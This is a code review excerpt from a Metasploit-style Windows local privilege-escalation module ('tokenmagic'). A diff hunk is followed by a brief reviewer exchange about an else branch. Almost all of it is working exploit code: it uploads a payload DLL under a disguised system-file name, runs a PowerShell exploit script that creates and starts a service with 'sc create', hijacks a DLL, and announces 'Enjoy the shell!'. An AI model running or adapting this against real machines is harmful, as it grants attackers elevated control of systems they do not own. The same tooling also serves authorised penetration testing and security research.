modules/exploits/windows/local/tokenmagic.rb

```diff
@@ -0,0 +1,269 @@
+      print_error('Caught timeout.  Exploit may be taking longer or it may have failed.')
+    end
+
+    print_status('Starting the interactive scan job...')
+    launch_dll_trigger
+
+    print_status('Enjoy the shell!')
+  end
+
+  def start_service(service_name, bin_path, cmd_path)
+    # Read in Generic Script
+    script = exploit_data('tokenmagic', 'tokenmagic.ps1')
+    fail_with(Failure::BadConfig, 'No exploit script found') if script.nil?
+
+    # Replace Value in Generic Script. Note Windows 7 requires spaces after the equal signs in the below command.
+    cmd_args = "/c sc create #{service_name} binPath= #{bin_path} type= own start= demand && sc start #{service_name}"
+
+    script.gsub!('_CMD_PATH_', cmd_path)
+    script.gsub!('_CMD_ARGS_', cmd_args)
+
+    # Run Exploit Script
+    print_status("Running Exploit on #{sysinfo['Computer']}")
+    begin
+      session.powershell.execute_string({ code: script })
+    rescue Rex::TimeoutError => e
+      elog('Caught timeout.  Exploit may be taking longer or it may have failed.', error: e)
+      print_error('Caught timeout.  Exploit may be taking longer or it may have failed.')
+    end
+  end
+
+  def payload_arch
+    if payload.arch.include?(ARCH_X64)
+      return ARCH_X64
+    else
+      return ARCH_X86
+    end
+  end
+
+  def exploit
+    win_dir = session.sys.config.getenv('windir')
+    cmd_path = "#{win_dir}\\system32\\cmd.exe"
+    if datastore['SERVICE_FILENAME'].nil? || datastore['SERVICE_FILENAME'].empty?
+      service_filename = Rex::Text.rand_text_alpha(5..9).to_s
+    else
+      service_filename = datastore['SERVICE_FILENAME']
+    end
+    service_filename = "#{service_filename}.exe" unless service_filename.end_with?('.exe')
+    if datastore['SERVICE_NAME'].nil? || datastore['SERVICE_NAME'].empty?
+      service_name = Rex::Text.rand_text_alpha(5..9).to_s
+    else
+      service_name = datastore['SERVICE_NAME']
+    end
+    if datastore['WRITABLE_DIR'].nil? || datastore['WRITABLE_DIR'].empty?
+      writable_dir = session.sys.config.getenv('TEMP').to_s
+    else
+      writable_dir = datastore['WRITABLE_DIR']
+    end
+
+    if datastore['METHOD'] =~ /DLL/i
+      bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll"
+      payload_dll = generate_payload_dll
+      print_status("Payload DLL is #{payload_dll.length} bytes long")
+      client.core.use('powershell') if !client.ext.aliases.include?('powershell')
+
+      # Check target
+      vprint_status('Checking Target')
+      validate_active_host
+      validate_payload
+
+      # Upload the payload
+      print_status("Uploading payload to #{bin_path}")
+      write_file(bin_path, payload_dll)
+      register_file_for_cleanup(bin_path)
+      register_file_for_cleanup('C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.
+      # Run the exploit
+      _output = start_dll_hijack(bin_path, cmd_path)
+      return
+    end
+
```

Comment:
`else` here?  No reason to create the service exe if we're using the dll method.

Reply:
Prefer an else to an early return